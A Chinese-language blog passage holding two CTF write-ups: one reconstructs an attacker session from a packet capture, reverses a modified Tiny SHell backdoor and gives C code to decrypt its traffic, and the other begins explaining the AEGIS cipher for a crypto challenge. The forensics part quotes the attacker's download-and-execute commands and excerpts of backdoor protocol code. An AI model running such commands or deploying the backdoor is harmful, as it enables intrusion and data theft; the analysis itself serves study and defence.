┃       139       41.876    1.293     forward   keystroke        36
┃       141       43.412    1.536     forward   keystroke        36
┃       143       47.094    3.682     forward   keystroke        36
┃       145       49.041    1.948     forward   keystroke        36
┃       147       52.207    3.165     forward   < delete/ac      36
┃       149       53.034    0.827     forward   < delete/ac      36
┃       151       54.255    1.221     forward   keystroke        36
┃       153       56.116    1.862     forward   keystroke        36
┃       155       57.436    1.32      forward   keystroke        36
┃       157       59.175    1.739     forward   keystroke        36
┃       159       60.603    1.428     forward   keystroke        36
┃       161       61.222    0.619     forward   keystroke        36
┃       163       62.656    1.434     forward   < delete/ac      36
┃       165       63.367    0.711     forward   < delete/ac      36
┃       167       64.902    1.536     forward   keystroke        36
┃       169       65.825    0.922     forward   keystroke        36
┃       171       67.156    1.331     forward   keystroke        36
┃       173       68.692    1.536     forward   keystroke        36
┃       175       71.053    2.362     forward   keystroke        36
┃       177       73.001    1.948     forward   keystroke        36
┃       179       73.606    0.604     forward   keystroke        36
┃       181       74.937    1.331     forward   < delete/ac      36
┃       183       75.762    0.825     forward   < delete/ac      36
┃       185       76.584    0.822     forward   < delete/ac      36
┃       187       77.803    1.22      forward   keystroke        36
┃       189       78.948    1.144     forward   keystroke        36
┃       191       79.954    1.007     forward   keystroke        36
┃       193       81.183    1.229     forward   keystroke        36
┃       195       82.309    1.125     forward   < delete/ac      36
┃       197       83.538    1.229     forward   keystroke        36
┃       199       84.766    1.228     forward   keystroke        36
┃       201       86.097    1.331     forward   < delete/ac      36
┃       203       87.542    1.445     forward   keystroke        36
┃       205       88.564    1.022     forward   keystroke        36
┃       207       89.476    0.913     forward   keystroke        36
┃       211       91.728    2.252     forward   _┃ ENTER        100
┃
┃
┗━━━━ End of Analysis for stream 0

... packet-strider-ssh complete

通过比对输入的字符的个数，可以验证ssh中的流量正是提供的keylog记录的数据。
然而比较有趣的是，第三行的输入似乎有过几次delete的痕迹，而delete从keylog中似乎没有体现出来。根据此时提供的工具，我们可以尝试还原攻击者链接ssh后进行的输入，可以得到如下的结果:

1
2
3

wget http://192.168.1.5:9999/bash
chmod +x bash
./bash 0VPMjuNZs3eiGad

stream 1：bash的逆向

由于stream1中是一个http请求，我们可以尝试讲文件进行dump

很容易的可以发现，http请求了一个elf文件，这一步正好就是keylog中记录的第一步。于是我们简单逆向一下bash。
可以发现，这个bash文件很类似一个加密的shell，等待攻击者的机器与其通信。文件首先会尝试绑定本地的IP，并且将运行时的第一个参数作为密钥解密

在这个函数中，会有大量的通信逻辑，并且其中还加载着多个加密逻辑:

do
  {
    v12 = recv(fd, v11, 16 - v10, 0);       // <----- 通信逻辑
    if ( !v12 )
    {
      dword_2106C0 = -2;
      return 0;
    }
    if ( v12 < 0 )
    {
      dword_2106C0 = -1;
      return 0;
    }
    v10 += v12;
    v11 += v12;
  }
  while ( v10 <= 0xF );
  dword_2106C0 = -6;
  if ( (unsigned int)sub_11A0(fd) != 1 )
    return 0;
  if ( v20 != 16 || (v5 = memcmp(&xmmword_2106E0, &xmmword_210130, 0x10uLL)) != 0 )
  {
    dword_2106C0 = -3;
    v5 = 0;
  }
  else
  {
    v14 = (__int64 *)&xmmword_2106E0;
    xmmword_2106E0 = 4096;
    MEMORY[0x2106E2] = xmmword_210130;
    do
    {
      v15 = v14;
      *v14 ^= qword_211B28;         // <----- 疑似加密逻辑
      v14[1] ^= qword_211B30;
      v14 += 2;
      sub_3C60(&unk_211720, v15);
      v16 = *(v14 - 1);
      qword_211B28 = *(v14 - 2);
      qword_211B30 = v16;
    }
    while ( v14 != (__int64 *)((char *)&qword_2106FC + 4) );

考虑到stream 2我们还没有弄明白其含义，并且其中并没有包含任何明文。结合我们最终需要找flag的需求，很可能最终的flag存在于加密的通信内容中。于是此时我们需要简单的逆向bash的逻辑。

Tiny SHell

考虑到整个题目的通信比较完整，可能不是一个简单的bash程序，所以上网搜了一圈，找到了非常类似源码项目。这个项目的介绍是：

Tiny SHell - An open-source UNIX backdoor

项目文件中包含了aes、sha1等文件，基本上实锤了其中存在加密的成分。之后用PEiD简单查看，发现这个bash程序中，包含了md5和sha1两种签名算法（这是一个伏笔），于是结合着源码来看，很快就有了如下的分析：

出题人简单魔改了程序入口，密钥需要经过输入入口的异或才会被使用。
出题人在代码某处增加了md5算法。

结合这段分析，我们对整个题目有了更新的认识：

stream 2：加密协议的解密

到了最后一步，此时已经明白了基本的目标，于是此时需要分析整个Tiny SHell通信过程中的加密流程。这边可以结合着代码和逆向结果来看：

初始化 pel

由于此时Tiny SHell作为一个部署在被攻击机器的正向shell，其首先会尝试去进行server端的初始化（因为是等待链接的），在源码中的形式为:

int pel_server_init( int client, char *key )
{
    int ret, len;
    unsigned char IV1[20], IV2[20];

    /* get the IVs from the client */

    ret = pel_recv_all( client, buffer, 40, 0 );

    if( ret != PEL_SUCCESS ) return( PEL_FAILURE );

    memcpy( IV2, &buffer[ 0], 20 );
    memcpy( IV1, &buffer[20], 20 );

    /* setup the session keys */

    pel_setup_context( &send_ctx, key, IV1 );
    pel_setup_context( &recv_ctx, key, IV2 );

对应到二进制程序:

v2 = buffer;
v3 = 0LL;
do
{
  v4 = recv(client, v2, 40 - v3, 0);
  v5 = v4;
  if ( !v4 )
  {
    RecvStatus = -2;
    return v5;
  }
  if ( v4 < 0 )
  {
    RecvStatus = -1;
    return 0;
  }
  v3 += v4;
  v2 += v4;
}
while ( v3 <= 0x27 );                         //    ret = pel_recv_all( client, buffer, 40, 0 );

这一段可以对应源码中的 ret = pel_recv_all( client, buffer, 40, 0 );，并且我们此时检查流量包，发现stream 2 的第一个流量包确实是40字节，验证了我们的猜想。

之后，根据源码，会去调用一个叫做pel_setup_context的函数

void pel_setup_context( struct pel_context *pel_ctx,
                        char *key, unsigned char IV[20] )
{
    int i;
    struct sha1_context sha1_ctx;

    sha1_starts( &sha1_ctx );
    sha1_update( &sha1_ctx, (uint8 *) key, strlen( key ) );
    sha1_update( &sha1_ctx, IV, 20 );
    sha1_finish( &sha1_ctx, buffer );

    aes_set_key( &pel_ctx->SK, buffer, 128 );

    memcpy( pel_ctx->LCT, IV, 16 );

    memset( pel_ctx->k_ipad, 0x36, 64 );
    memset( pel_ctx->k_opad, 0x5C, 64 );

    for( i = 0; i < 20; i++ )
    {
        pel_ctx->k_ipad[i] ^= buffer[i];
        pel_ctx->k_opad[i] ^= buffer[i];
    }

    pel_ctx->p_cntr = 0;
}

然而这个地方，如果尝试逆向了二进制程序中，会发现此时调用的并不是sha1，而是md5（正好回收了之前的伏笔）:

RecvStatus = -6;
 *(_QWORD *)IV2 = *(_QWORD *)buffer;
 *(_QWORD *)&IV2[8] = *(_QWORD *)&buffer[8];
 *(_DWORD *)&IV2[16] = *(_DWORD *)&buffer[16];
 *(_QWORD *)IV1 = *(_QWORD *)&buffer[20];
 *(_QWORD *)&IV1[8] = *(_QWORD *)&buffer[28];
 *(_DWORD *)&IV1[16] = *(_DWORD *)&buffer[36]; // 
                                               //     memcpy( IV2, &buffer[ 0], 20 );
                                               //     memcpy( IV1, &buffer[20], 20 );
 MD5Init((MD5_CTX *)send_ctx);
 v6 = strlen(key);
 MD5Update((MD5_CTX *)send_ctx, (unsigned __int8 *)key, v6);
 MD5Update((MD5_CTX *)send_ctx, (unsigned __int8 *)IV1, 0x14u);
 MD5Final((MD5_CTX *)send_ctx, buffer);

这个地方是本题的一个坑点，如果无脑的使用了源码，那么最终的解密是一定会失败的。并且可以注意到，此时将发送包的前20字节用作生成recv密钥，后20字节用于生成send密钥。那么直到这一步，我们有如下结论:

第一个包收到的40字节，用于生成send密钥和recv密钥
前20字节是recv密钥
后20字节是send密钥

recv decrypt and check challenge

之后的逻辑中，为了保证整个通信能建立成功，以及密钥为正确的密钥，此时会检查一个签名

do
{
  v12 = recv(client, v11, 16 - v10, 0);
  if ( !v12 )
  {
    RecvStatus = -2;
    return 0;
  }
  if ( v12 < 0 )
  {
    RecvStatus = -1;
    return 0;
  }
  v10 += v12;
  v11 += v12;
}
while ( v10 <= 0xF );                         // ret = pel_recv_msg( client, buffer, &len );
RecvStatus = -6;
if ( (unsigned int)sub_11A0(client, buffer, &v20) != 1 )
  return 0;
if ( v20 != 16 || (v5 = memcmp(buffer, &encode_sign, 0x10uLL)) != 0 )
{
  RecvStatus = -3;
  v5 = 0;
}

这里可以看到，首先会接受长度为16字节的字符，然后将其传入sub_11A0，一同操作之后得到的buffer需要和encode_sign进行比较，从而验证整个通信过程中的密钥是否正确

1	.data:0000000000210130 encode_sign xmmword 0ED417AFD387B717304ED8580F0B30E9Ah

这边的签名也被出题人该过，所以不能完全信赖源码啊

可以注意到，在进行签名比较之前，程序会调用函数sub_11A0，这个函数比较长，可以结合着源码看:

unsigned char temp[16];
unsigned char hmac[20];
unsigned char digest[20];
struct sha1_context sha1_ctx;
int i, j, ret, blk_len;

/* receive the first encrypted block */

ret = pel_recv_all( sockfd, buffer, 16, 0 );

if( ret != PEL_SUCCESS ) return( PEL_FAILURE );

/* decrypt this block and extract the message length */

memcpy( temp, buffer, 16 );

aes_decrypt( &recv_ctx.SK, buffer );

for( j = 0; j < 16; j++ )
{
    buffer[j] ^= recv_ctx.LCT[j];
}

*length = ( ((int) buffer[0]) << 8 ) + (int) buffer[1];

/* restore the ciphertext */

memcpy( buffer, temp, 16 );

/* verify the message length */

if( *length <= 0 || *length > BUFSIZE )
{
    pel_errno = PEL_BAD_MSG_LENGTH;

    return( PEL_FAILURE );
}

大致的逻辑就是：程序接受的16字节字符串，使用我们之前生成的recv密钥进行解密（解密方式为类似cbc的模式），并且解密解开的buffer中，前两个字节表示当前输入的长度。如果输入的长度超过固定大小，则同样视为解密失败。如果长度解密完成之后，还要进行完整性校验:

/* verify the message length */
 printf("Decrypt length:%d\n", *length);
 if( *length <= 0 || *length > BUFSIZE )
 {
     pel_errno = PEL_BAD_MSG_LENGTH;
     printf("ERROR length:%d\n", *length);

     return( PEL_FAILURE );
 }

 /* round up to AES block length (16 bytes) */

 blk_len = 2 + *length;

 if( ( blk_len & 0x0F ) != 0 )
 {
     blk_len += 16 - ( blk_len & 0x0F );
 }

 /* receive the remaining ciphertext and the mac */

 // ret = pel_recv_all( sockfd, &buffer[16], blk_len - 16 + 20, 0 );
 memcpy(&buffer[16], &recv_msg[16], blk_len - 16 + 20);

 if( ret != PEL_SUCCESS ) return( PEL_FAILURE );

 memcpy( hmac, &buffer[blk_len], 20 );

 /* verify the ciphertext integrity */

 buffer[blk_len    ] = ( recv_ctx.p_cntr << 24 ) & 0xFF;
 buffer[blk_len + 1] = ( recv_ctx.p_cntr << 16 ) & 0xFF;
 buffer[blk_len + 2] = ( recv_ctx.p_cntr <<  8 ) & 0xFF;
 buffer[blk_len + 3] = ( recv_ctx.p_cntr       ) & 0xFF;

 sha1_starts( &sha1_ctx );
 sha1_update( &sha1_ctx, recv_ctx.k_ipad, 64 );
 sha1_update( &sha1_ctx, buffer, blk_len + 4 );
 sha1_finish( &sha1_ctx, digest );

 sha1_starts( &sha1_ctx );
 sha1_update( &sha1_ctx, recv_ctx.k_opad, 64 );
 sha1_update( &sha1_ctx, digest, 20 );
 sha1_finish( &sha1_ctx, digest );

 if( memcmp( hmac, digest, 20 ) != 0 )
 {
     puts("hmac not equal!");
     pel_errno = PEL_CORRUPTED_DATA;

     return( PEL_FAILURE );
 }

 /* increment the packet counter */

 recv_ctx.p_cntr++;

这边会根据本应传输的buffer长度，直接跳转到buffer的尾部，然后并且用之前生成的密钥进行消息的验证。完成确认之后，最终会对整个传输的数据进行解密:

/* finally, decrypt and copy the message */

    for( i = 0; i < blk_len; i += 16 )
    {
        memcpy( temp, &buffer[i], 16 );

        aes_decrypt( &recv_ctx.SK, &buffer[i] );

        for( j = 0; j < 16; j++ )
        {
            buffer[i + j] ^= recv_ctx.LCT[j];
        }

        memcpy( recv_ctx.LCT, temp, 16 );
    }

    memcpy( msg, &buffer[2], *length );

    pel_errno = PEL_UNDEFINED_ERROR;

    return( PEL_SUCCESS );

于是在完成这一大段分析之后，我们可以得到Tiny SHell的一个基本的传输协议:

1	content_length(2 byte)+content_encrypt(length byte)+hmac(20 byte)

在完成了数据解密之后，程序会去check当前解密的数据和encode_sign是否相等，从而完成检查。（还剩一小段见下）

回到流量包，可以看到目前的流量传输形式如下:

红色部分的是攻击机器往受害者机器通信的流量，蓝色的则是受害者机器回复攻击机器通信的流量，看起来整个流量通信中似乎bash也有往攻击机器发送流量的部分。会看刚刚的challenge逻辑，可以看到我们还有一小段没有分析:

 buffer[35] = qword_211BB8;
  SHA1Init((SHA1_CTX *)send_ctx);
  SHA1Update((SHA1_CTX *)send_ctx, &unk_211B38, 0x40uLL);
  SHA1Update((SHA1_CTX *)send_ctx, buffer, 0x24uLL);
  SHA1Final((unsigned __int64 *)send_ctx, data);
  SHA1Init((SHA1_CTX *)send_ctx);
  SHA1Update((SHA1_CTX *)send_ctx, &unk_211B78, 0x40uLL);
  SHA1Update((SHA1_CTX *)send_ctx, data, 0x14uLL);
  v18 = 0LL;
  SHA1Final((unsigned __int64 *)send_ctx, &buffer[32]);
  ++qword_211BB8;
  do
  {
    v19 = send(client, v17, 52 - v18, 0);
    if ( v19 < 0 )
    {
      RecvStatus = -1;
      return v5;
    }
    v18 += v19;
    v17 += v19;
  }
  while ( v18 <= 0x33 );
  RecvStatus = -6;
  v5 = 1;
}                                             // ret = pel_send_msg( client, challenge, 16 );

结合上文分析，这边将我们的challenge（也就是encode_sign）向客户端发送。此时发送也有一个函数，不过此时使用的是send密钥进行加密。于是上图中的问号部分也可以解开了，是server用于和client通信的数据包。

于是整个challenge流程可以写作如下:

server监听来自client发送的两个IV，并且初始化自己的密钥，其中前20字节用于生成recv，后20字节用于生成send
client发送一个用IV加密后的密文，此时使用recv密钥进行解密
server验证收到的密文是否为encode_sign，相等之后，将这个验证过程发送到client，最终完成验证

最终的文件获取

在前面几个步骤中，我们已经理清了整个加密流程，于是我们利用源码，可以简单的改造一下，写一个解密脚本


void pel_setup_context( struct pel_context *pel_ctx,
                        char *key, unsigned char IV[20] )
{
    int i;
    // struct sha1_context sha1_ctx;
    md5_state_t md5_ctx;

    md5_init(&md5_ctx);
    md5_append(&md5_ctx, key, strlen(key));
    md5_append(&md5_ctx, IV, 20);
    md5_finish(&md5_ctx,buffer);

    // sha1_starts( &sha1_ctx );
    // sha1_update( &sha1_ctx, (uint8 *) key, strlen( key ) );
    // sha1_update( &sha1_ctx, IV, 20 );
    // sha1_finish( &sha1_ctx, buffer );

    aes_set_key( &pel_ctx->SK, buffer, 128 );

    memcpy( pel_ctx->LCT, IV, 16 );

    memset( pel_ctx->k_ipad, 0x36, 64 );
    memset( pel_ctx->k_opad, 0x5C, 64 );

    for( i = 0; i < 20; i++ )
    {
        pel_ctx->k_ipad[i] ^= buffer[i];
        pel_ctx->k_opad[i] ^= buffer[i];
    }

    pel_ctx->p_cntr = 0;
    memset(buffer,0,sizeof(buffer));
}
int decrypt_init( char *key )
{
    int ret, len;
    unsigned char IV1[20], IV2[20];

    /* get the IVs from the client */

    // ret = pel_recv_all( client, buffer, 40, 0 );

    // if( ret != PEL_SUCCESS ) return( PEL_FAILURE );

    memcpy( IV2, &peer0_0[ 0], 20 );
    memcpy( IV1, &peer0_0[20], 20 );

    /* setup the session keys */

    pel_setup_context( &send_ctx, key, IV1 );
    pel_setup_context( &recv_ctx, key, IV2 );    
    puts("decrypt init finish");
}

/* receive and decrypt a message */

int pel_recv_msg(char* recv_msg, int size, unsigned char *msg, int *length )
{
    unsigned char temp[16];
    unsigned char hmac[20];
    unsigned char digest[20];
    struct sha1_context sha1_ctx;
    int i, j, ret, blk_len;
    ret = PEL_SUCCESS;

    /* receive the first encrypted block */

    // ret = pel_recv_all( sockfd, buffer, 16, 0 );
    memset(buffer, '\0', sizeof(buffer));
    memcpy(buffer, recv_msg, 16);
    // for( j = 0; j < 16; j++ )
    // {
    //     printf("0x%x,",recv_ctx.SK.drk[j]);
    //     // buffer[j] ^= recv_ctx.LCT[j];
    // }
    // puts("");

    if( ret != PEL_SUCCESS ) return( PEL_FAILURE );

    /* decrypt this block and extract the message length */

    memcpy( temp, buffer, 16 );

    aes_decrypt( &recv_ctx.SK, buffer );

    for( j = 0; j < 16; j++ )
    {
        buffer[j] ^= recv_ctx.LCT[j];
        // printf("0x%x,",buffer[j]);
    }
    // puts("");

    *length = ( (buffer[0]) << 8 ) + buffer[1];

    /* restore the ciphertext */

    memcpy( buffer, temp, 16 );

    /* verify the message length */
    printf("Decrypt length:%d\n", *length);
    if( *length <= 0 || *length > BUFSIZE )
    {
        pel_errno = PEL_BAD_MSG_LENGTH;
        printf("ERROR length:%d\n", *length);

        return( PEL_FAILURE );
    }

    /* round up to AES block length (16 bytes) */

    blk_len = 2 + *length;

    if( ( blk_len & 0x0F ) != 0 )
    {
        blk_len += 16 - ( blk_len & 0x0F );
    }

    /* receive the remaining ciphertext and the mac */

    // ret = pel_recv_all( sockfd, &buffer[16], blk_len - 16 + 20, 0 );
    memcpy(&buffer[16], &recv_msg[16], blk_len - 16 + 20);

    if( ret != PEL_SUCCESS ) return( PEL_FAILURE );

    memcpy( hmac, &buffer[blk_len], 20 );

    /* verify the ciphertext integrity */

    buffer[blk_len    ] = ( recv_ctx.p_cntr << 24 ) & 0xFF;
    buffer[blk_len + 1] = ( recv_ctx.p_cntr << 16 ) & 0xFF;
    buffer[blk_len + 2] = ( recv_ctx.p_cntr <<  8 ) & 0xFF;
    buffer[blk_len + 3] = ( recv_ctx.p_cntr       ) & 0xFF;

    sha1_starts( &sha1_ctx );
    sha1_update( &sha1_ctx, recv_ctx.k_ipad, 64 );
    sha1_update( &sha1_ctx, buffer, blk_len + 4 );
    sha1_finish( &sha1_ctx, digest );

    sha1_starts( &sha1_ctx );
    sha1_update( &sha1_ctx, recv_ctx.k_opad, 64 );
    sha1_update( &sha1_ctx, digest, 20 );
    sha1_finish( &sha1_ctx, digest );

    // if( memcmp( hmac, digest, 20 ) != 0 )
    // {
    //     puts("hmac not equal!");
    //     pel_errno = PEL_CORRUPTED_DATA;

    //     return( PEL_FAILURE );
    // }

    /* increment the packet counter */

    recv_ctx.p_cntr++;

    /* finally, decrypt and copy the message */

    for( i = 0; i < blk_len; i += 16 )
    {
        memcpy( temp, &buffer[i], 16 );

        aes_decrypt( &recv_ctx.SK, &buffer[i] );

        for( j = 0; j < 16; j++ )
        {
            buffer[i + j] ^= recv_ctx.LCT[j];
        }

        memcpy( recv_ctx.LCT, temp, 16 );
    }

    memcpy( msg, &buffer[2], *length );

    pel_errno = PEL_UNDEFINED_ERROR;

    return( PEL_SUCCESS );
}


int pel_send_msg(char* recv_msg, int size, unsigned char *msg, int *length )
{
    unsigned char temp[16];
    unsigned char hmac[20];
    unsigned char digest[20];
    struct sha1_context sha1_ctx;
    int i, j, ret, blk_len;
    ret = PEL_SUCCESS;

    /* receive the first encrypted block */

    // ret = pel_recv_all( sockfd, buffer, 16, 0 );
    memset(buffer, '\0', sizeof(buffer));
    memcpy(buffer, recv_msg, 16);
    // for( j = 0; j < 16; j++ )
    // {
    //     printf("0x%x,",recv_ctx.SK.drk[j]);
    //     // buffer[j] ^= recv_ctx.LCT[j];
    // }
    // puts("");

    if( ret != PEL_SUCCESS ) return( PEL_FAILURE );

    /* decrypt this block and extract the message length */

    memcpy( temp, buffer, 16 );

    aes_decrypt( &send_ctx.SK, buffer );

    for( j = 0; j < 16; j++ )
    {
        buffer[j] ^= send_ctx.LCT[j];
        // printf("0x%x,",buffer[j]);
    }
    // puts("");

    *length = ( (buffer[0]) << 8 ) + buffer[1];

    /* restore the ciphertext */

    memcpy( buffer, temp, 16 );

    /* verify the message length */
    printf("Decrypt length:%d\n", *length);
    if( *length <= 0 || *length > BUFSIZE )
    {
        pel_errno = PEL_BAD_MSG_LENGTH;
        printf("ERROR length:%d\n", *length);

        return( PEL_FAILURE );
    }

    /* round up to AES block length (16 bytes) */

    blk_len = 2 + *length;

    if( ( blk_len & 0x0F ) != 0 )
    {
        blk_len += 16 - ( blk_len & 0x0F );
    }

    /* receive the remaining ciphertext and the mac */

    // ret = pel_recv_all( sockfd, &buffer[16], blk_len - 16 + 20, 0 );
    memcpy(&buffer[16], &recv_msg[16], blk_len - 16 + 20);
    printf("final the length:%d\n",blk_len + 20);

    if( ret != PEL_SUCCESS ) return( PEL_FAILURE );

    memcpy( hmac, &buffer[blk_len], 20 );

    /* verify the ciphertext integrity */

    buffer[blk_len    ] = ( send_ctx.p_cntr << 24 ) & 0xFF;
    buffer[blk_len + 1] = ( send_ctx.p_cntr << 16 ) & 0xFF;
    buffer[blk_len + 2] = ( send_ctx.p_cntr <<  8 ) & 0xFF;
    buffer[blk_len + 3] = ( send_ctx.p_cntr       ) & 0xFF;

    sha1_starts( &sha1_ctx );
    sha1_update( &sha1_ctx, send_ctx.k_ipad, 64 );
    sha1_update( &sha1_ctx, buffer, blk_len + 4 );
    sha1_finish( &sha1_ctx, digest );

    sha1_starts( &sha1_ctx );
    sha1_update( &sha1_ctx, send_ctx.k_opad, 64 );
    sha1_update( &sha1_ctx, digest, 20 );
    sha1_finish( &sha1_ctx, digest );

    // if( memcmp( hmac, digest, 20 ) != 0 )
    // {
    //     puts("hmac not equal!");
    //     pel_errno = PEL_CORRUPTED_DATA;

    //     return( PEL_FAILURE );
    // }

    /* increment the packet counter */

    send_ctx.p_cntr++;

    /* finally, decrypt and copy the message */
    printf("blk_len:%d\n",blk_len);
    for( i = 0; i < blk_len; i += 16 )
    {
        memcpy( temp, &buffer[i], 16 );

        aes_decrypt( &send_ctx.SK, &buffer[i] );

        for( j = 0; j < 16; j++ )
        {
            buffer[i + j] ^= send_ctx.LCT[j];
        }

        memcpy( send_ctx.LCT, temp, 16 );
    }

    memcpy( msg, &buffer[2], *length );

    pel_errno = PEL_UNDEFINED_ERROR;

    return( PEL_SUCCESS );
}



int check_challange(char* input,int size)
{
    int len = 0;
    int ret = 0;
    puts("check challenge");
    ret = pel_recv_msg( input, size, buffer, &len );
    if( ret != PEL_SUCCESS ){
        printf("the error code is %x\n",ret);
        return( PEL_FAILURE );
    }
    for(int i = 0; i < len; i++)
    {
        printf("%x", buffer[i]);
    }
    puts("");

    if( len != 16 || memcmp( buffer, challenge, 16 ) != 0 )
    {
        pel_errno = PEL_WRONG_CHALLENGE;

        return( PEL_FAILURE );
    }
    return( PEL_SUCCESS );
}
int check_send_challange(char* input,int size)
{
    int len = 0;
    int ret = 0;
    puts("check challenge");
    ret = pel_send_msg( input, size, buffer, &len );
    if( ret != PEL_SUCCESS ){
        printf("the error code is %x\n",ret);
        return( PEL_FAILURE );
    }
    for(int i = 0; i < len; i++)
    {
        printf("%x", buffer[i]);
    }
    puts("");

    if( len != 16 || memcmp( buffer, challenge, 16 ) != 0 )
    {
        pel_errno = PEL_WRONG_CHALLENGE;

        return( PEL_FAILURE );
    }
    return( PEL_SUCCESS );
}
int write_msg(char* input,int size)
{
    int len = 0;
    int ret = 0;
    char filename[] =  "./answer.jpg";
    puts("check challenge");
    ret = pel_send_msg( input, size, buffer, &len );
    if( ret != PEL_SUCCESS ){
        printf("the error code is %x\n",ret);
        return( PEL_FAILURE );
    }
    int fd=open(filename, O_RDWR|O_CREAT|O_APPEND, 0644);
    if(fd < 0)
    {
        puts("open error!");
        printf("errno is %d\n",errno);
        return-1;
    }
    write(fd, buffer, len);
    close(fd);
}

int check_msg(char* input,int size)
{
    int len = 0;
    int ret = 0;
    puts("check challenge");
    ret = pel_recv_msg( input, size, buffer, &len );
    if( ret != PEL_SUCCESS ){
        printf("the error code is %x\n",ret);
        return( PEL_FAILURE );
    }
    for(int i = 0; i < len; i++)
    {
        printf("%x", buffer[i]);
    }
    puts("");
    return( PEL_SUCCESS );
}

int main()
{
    char key[] = "IRuk5NEUbZorqn7";
    decrypt_init(key);
    check_challange(peer0_1, sizeof(peer0_1));
    check_send_challange(peer1_0, sizeof(peer1_0));
    check_challange(peer0_2, sizeof(peer1_0));
    check_challange(peer0_3, sizeof(peer0_3));

}

对比此时的流量图如下:

此时要记住，红色的流表示的是攻击者发送到受害者的包，蓝色的流表示的是受害者发向攻击者的包，在记住了这个之后，我们就能知道，
packet425和427两个包，表示的是攻击者企图从受害者电脑上偷取的文件名字，也就是一个类似get的函数。并且在源码中也能找到类似的函数:

int tshd_get_file( int client )
{
    int ret, len, fd;
    /* get the filename */
    ret = pel_recv_msg( client, message, &len );
    if( ret != PEL_SUCCESS )
    {
        return( 14 );
    }

    message[len] = '\0';
    // ..

于是最终的flag很明显了，就是此时从受害者主机上偷走的文件！

所以最后我们根据整个解密代码，以及解析流量包，可以将main函数完善如下:

int main()
{
    puts("init");
    char key[] = "IRuk5NEUbZorqn7";
    decrypt_init(key);
    check_challange(peer0_1, sizeof(peer0_1));
    check_send_challange(peer1_0, sizeof(peer1_0));
    check_challange(peer0_2, sizeof(peer1_0));
    check_challange(peer0_3, sizeof(peer0_3));
    const int walk = 4132;
    for(int i = 0;i < sizeof(peer1_1); i+= walk)
    {
        write_msg(&peer1_1[i], 4096);
    }
    return 0;
}

最终解密发现文件是一个jpeg文件，打开后得到最终的flag

至此，整个题目解密完成

一些思考

遇到这个题目的时候，实际上比赛已经结束了，然而整个题目非常之巧妙，当发现最终的flag【来自于受害者主机】的时候，感觉真的有一种要拿到宝藏的感觉。misc题目设计最困难的就是诱导选手去思考题目，而这边将三个考点分别藏在了同一个流量包的三段stream上，做起来一气呵成，没有太多需要脑洞的地方，实属misc脑洞横飞中的一股清流。

misc题目这个方向下的取证题目质量通常参差不齐，而本题基本上是模拟了一个现实场景中，针对攻击者的简易攻击，进行取证，信息搜集，协议分析，逆向，加密协议破解等均进行了考察，笔者从这边了解到了不少的知识，感觉受益匪浅。

最后不多说了，吹爆出题人就完事儿了~

Taihu-Aegis-Writeup

2020-11-29T12:18:35.000Z

第一次出密码学的题目，为了出题特地去做了googlectf 2020的密码学，结果找到一个叫做aegis的加密协议，觉得很适合做题目，于是就有了下面这个题目~
本文首发于安全客https://www.anquanke.com/post/id/222629

Aegis

整个出题的题目参考了googlectf 2020 Oracle的题目。由于考虑到比赛时长的问题（其实是作者比较菜），基本上是将其中的一个考点拿了出来修改成了当前的题目。针对那个题目比较完整的解法可以参考这里这个地方也有这个算法的比较详细的解释。

算法简介

AEGIS 算法是一种AEAD（authenticated encryption with associated data 关联数据的认证加密）加密。这种算法除了能够提供对指定明文的加密，还能够提供对未加密的关联数据的完整性保证。说通俗一点就是，除了能够对我们发送的需要加密的信息进行加密，同时还提供了对我们明文信息的长度和时间这些未加密的数据进行验证的手法。当我们将密文解开的时候，会包含一个之前提供的明文信息的验证途径，例如能够得到长度的一个验证数据，我们此时就能够用这个数据验证我们之前未加密的长度的完整性。
在题目中，我们能看到两种不同的值:pt和aad

1	ct, tag = cipher.encrypt(iv, aad, pt)

此处的pt表示的就是我们通常意义下的明文，而这里的aad，实际上就是authenticated associated data，认证关联数据。这个数据会参与到整个加密过程中，用于生成状态。
ct表示的是加密后的密文，tag则是在加密完成后的状态算法中生成的校验标签，可以用来校验aad的值是否发生变化。

关于aad的验证算法可以初步看一下加密过程。

def encrypt(self, iv, ad, msg):
  S = self.initialize(iv)
  S = self.update_aad(S, ad)
  S, ct = self.raw_encrypt(S, msg)
  tag = self.finalize(S, len(ad) * 8, len(msg) * 8)
  return ct, tag

def decrypt(self, iv, ad, ct, tag):
  S = self.initialize(iv)
  S = self.update_aad(S, ad)
  S, pt = self.raw_decrypt(S, ct)
  tag2 = self.finalize(S, len(ad) * 8, len(ct) * 8)
  if tag2 != tag:
    raise Exception('Invalid tag')
  return pt

由于在加密或者解密过程中，aad值参与了最初加密状态的生成，所以aad值在不变的前提下，加解密中状态（State）变化是一致的，最后阶段算出来的 tag2 理论上会和我们传入的tag一致，就是利用这一点来保证aad的完整性。

Aegis128的算法

想要明白当前的算法的漏洞，需要先看明白当前加密算法原理。整个加密中会维护一个状态的概念，然后我们需要加密的内容会类似一些向量来影响整个状态，从而对明文完成加密。那么首先，为了更加方便的描述加密过程，我们需要预先定义一些变量:

S[i]: 第i步更新的状态
S[i][j]: 第i步状态中，第j块128bit分组
^: 状态之间异或运算
&: 状态的与运算
const0: 128bit的一个魔数（0x000101020305080d1522375990e97962）
const1: 128bit的一个魔数（0xdb3d18556dc22ff12011314273b528dd）

Aegis有三种不同的加密方式，我们这里使用的是128版本

状态更新 StatusUpdate

Aegis加密算法中，一个重要的概操作就是状态更新StateUpdate。当这个过程发生的时候，其更新算法如下:

m: 一个128bit的信息
S[i+1] = StatueUpdate(S[i], m)
S[i+1][0] = S[i][0]^AESRound(S[i][4])^m
S[i+1][1] = S[i][1]^AESRound(S[i][0])
S[i+1][2] = S[i][2]^AESRound(S[i][1])
S[i+1][3] = S[i][3]^AESRound(S[i][2])
S[i+1][4] = S[i][4]^AESRound(S[i][3])

这个更新过程的流程大致可以写作如下:

初始化过程

整个算法的更新，首先使用密钥K128与初始化向量IV128进行一些运算，最终产生整个算法的初始状态。此时的K128为我们加密算法的密钥，IV128为一个可变的向量。整个生成的过程可以写作:

def initialize(self, iv):
    k_iv = _xor(self.key, iv)
    S = [k_iv,
         self.const_1,
         self.const_0,
         _xor(self.key, self.const_0),
         _xor(self.key, self.const_1)]
    for _ in range(5):
      S = self.state_update(S, self.key)
      S = self.state_update(S, k_iv)
    return S

根据代码，我们可以写作:

S[-5][0] = k128^iv128
S[-5][1] = const_1
S[-5][2] = const_0
S[-5][3] = k128^const_0
S[-5][4] = k128^const_1

for i in range(5)
    S[-5+i+1] = StatueUpdate(S[-4+i], k128)
    S[-5+i+1] = StatueUpdate(S[-4+i+1], k128^iv128)

这里写作-4，主要是为了可以同步，保证我们在起始状态下为S[0]。

Aegis 中的AES

